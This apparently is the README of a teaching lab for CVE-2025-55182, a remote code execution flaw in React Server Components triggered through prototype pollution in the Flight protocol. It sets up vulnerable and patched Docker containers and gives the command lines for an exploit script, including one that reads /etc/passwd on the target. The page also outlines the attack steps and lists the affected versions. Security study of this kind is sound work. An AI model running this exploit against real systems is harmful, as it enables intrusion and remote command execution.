
Laboratoire pédagogique démontrant la CVE-2025-55182 : RCE critique dans React Server Components via une pollution des prototypes dans le protocole Flight.
Laboratoire pédagogique démontrant CVE-2025-55182 — une vulnérabilité critique (CVSS 10.0) d'exécution de code à distance (RCE) dans les React Server Components, causée par une pollution de prototype dans le désérialiseur du protocole Flight.
Avertissement : Ce dépôt est destiné uniquement à des fins éducatives et de recherche en sécurité autorisée. L'accès non autorisé à des systèmes informatiques est illégal. L'auteur décline toute responsabilité en cas d'usage abusif de ce contenu. Utilisez-le uniquement contre des systèmes dont vous êtes propriétaire ou pour lesquels vous disposez d'une autorisation écrite explicite. En utilisant ce code, vous acceptez d'être responsable de vos propres actions.
# 1. Clone
git clone https://github.com/Jeanback1/react-rsc-cve-2025-55182-lab.git
cd react-rsc-cve-2025-55182-lab
# 2. Start the lab (vulnerable + patched instances)
docker compose up -d
# Wait ~2 minutes for both containers to build and start.
# 3. Exploit the vulnerable instance
python exploit/exploit.py http://localhost:3011 id
# 4. Try the same against the patched instance — it fails
python exploit/exploit.py http://localhost:3012 id
docker compose
┌────────────────────────────────┐
│ │
attacker ────▶│ :3011 → rsc-lab-vulnerable │ React 19.2.0
│ (Server Action) │ ← exploitable
│ │
│ :3012 → rsc-lab-patched │ React 19.2.1
│ (no Server Action) │ ← patched
└────────────────────────────────┘
| Conteneur | Port | Version de React | Server Action | Vulnérable ? |
|---|---|---|---|---|
rsc-lab-vulnerable | 3011 | 19.2.0 | Oui | Oui |
rsc-lab-patched | 3012 | 19.2.1 | Non | Non |
requests (pip install requests)├── docker-compose.yml # Lab orchestration
├── README.md # This file
├── LICENSE
│
├── vulnerable/ # Vulnerable Next.js app
│ ├── Dockerfile
│ ├── package.json # [email protected], [email protected]
│ └── app/
│ ├── layout.tsx
│ ├── page.tsx # Server Component + Server Action
│ └── actions.ts # 'use server' — the attack surface
│
├── patched/ # Patched Next.js app
│ ├── Dockerfile
│ ├── package.json # [email protected], [email protected]
│ └── app/
│ ├── layout.tsx
│ └── page.tsx # Server Component only (no Server Actions)
│
├── exploit/
│ ├── exploit.py # Educational RCE exploit (well-commented)
│ ├── requirements.txt
│ └── pyproject.toml
│
└── docs/
└── CVE-2025-55182.md # Full technical analysis
# Single command execution
python exploit/exploit.py <target> <command>
# Examples
python exploit/exploit.py http://localhost:3011 id
python exploit/exploit.py http://localhost:3011 "cat /etc/passwd"
python exploit/exploit.py http://localhost:3011 "ls -la /app"
L'exploit fonctionne en trois étapes :
__proto__ → polluer Object.prototype.thenmultipart/form-data via le point de terminaison Server ActionX-Action-Redirect (encodée en base64)| Paquet | Vulnérable | Corrigé |
|---|---|---|
react | ≤ 19.2.0 | ≥ 19.2.1 |
react-dom | ≤ 19.2.0 | ≥ 19.2.1 |
react-server-dom-webpack | ≤ 19.2.0 | ≥ 19.2.1 |
Voir docs/CVE-2025-55182.md pour une analyse complète :
__proto__ est dangereuse